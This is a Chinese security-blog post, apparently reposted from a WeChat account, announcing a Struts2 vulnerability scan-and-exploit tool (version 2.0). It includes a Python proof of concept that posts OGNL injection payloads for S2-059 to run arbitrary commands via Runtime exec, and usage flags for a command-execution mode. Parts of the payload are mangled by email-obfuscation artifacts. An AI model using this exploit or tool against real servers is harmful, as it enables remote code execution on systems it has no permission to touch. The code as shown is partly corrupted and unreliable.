Struts2漏洞检查&利用工具-2.0

  • A+
所属分类:安全工具
点击蓝字 关注我们

欢迎转发,请勿抄袭

        Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。

          本次更新了vulhub里面的struts2的全漏洞扫描。同时生成linux64位的运行软件。

linux下运行:

Struts2漏洞检查&利用工具-2.0

win下运行:

Struts2漏洞检查&利用工具-2.0

由于s2-059poc,没有回显,因此没有添加进去。

POC:

import requests

url = "http://127.0.0.1:8080"data1 = { "id": "%{(#context=#attr['struts.valueStack'].context).(#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@[email protected])).(#ognlUtil.setExcludedClasses('')).(#ognlUtil.setExcludedPackageNames(''))}"}data2 = { "id": "%{(#context=#attr['struts.valueStack'].context).(#context.setMemberAccess(@[email protected]_MEMBER_ACCESS)).(@[email protected]().exec('你的payload'))}"}res1 = requests.post(url, data=data1)# print(res1.text)res2 = requests.post(url, data=data2)# print(res2.text)

用法:

COMMANDS:   help, h  Shows a list of commands or help for one command

GLOBAL OPTIONS: --mode value 值exec和scan --vn value Vulnerability number (default: 0) --url value set target url --cmd value exec command(only work on exploit mode) --data value data for special vuln --help, -h show help (default: false)

如需进入学习交流群。请联系小编,小编带你进群。回复"struts2" 获取下载链接

文章声明:该工具、教程仅供学习参考,请勿非法使用。否则与作者无关!

Struts2漏洞检查&利用工具-2.0

扫二维码|关注我们



免责声明:本站提供安全工具、程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

转载声明:著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。


订阅查看更多复现文章、学习笔记

thelostworld

安全路上,与你并肩前行!!!!

Struts2漏洞检查&利用工具-2.0

个人知乎:https://www.zhihu.com/people/fu-wei-43-69/columns

个人简书:https://www.jianshu.com/u/bf0e38a8d400

个人CSDN:https://blog.csdn.net/qq_37602797/category_10169006.html

个人博客园:https://www.cnblogs.com/thelostworld/

FREEBUF主页:https://www.freebuf.com/author/thelostworld?type=article

Struts2漏洞检查&利用工具-2.0

欢迎添加本公众号作者微信交流,添加时备注一下“公众号”

Struts2漏洞检查&利用工具-2.0



本文始发于微信公众号(thelostworld):Struts2漏洞检查&利用工具-2.0

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: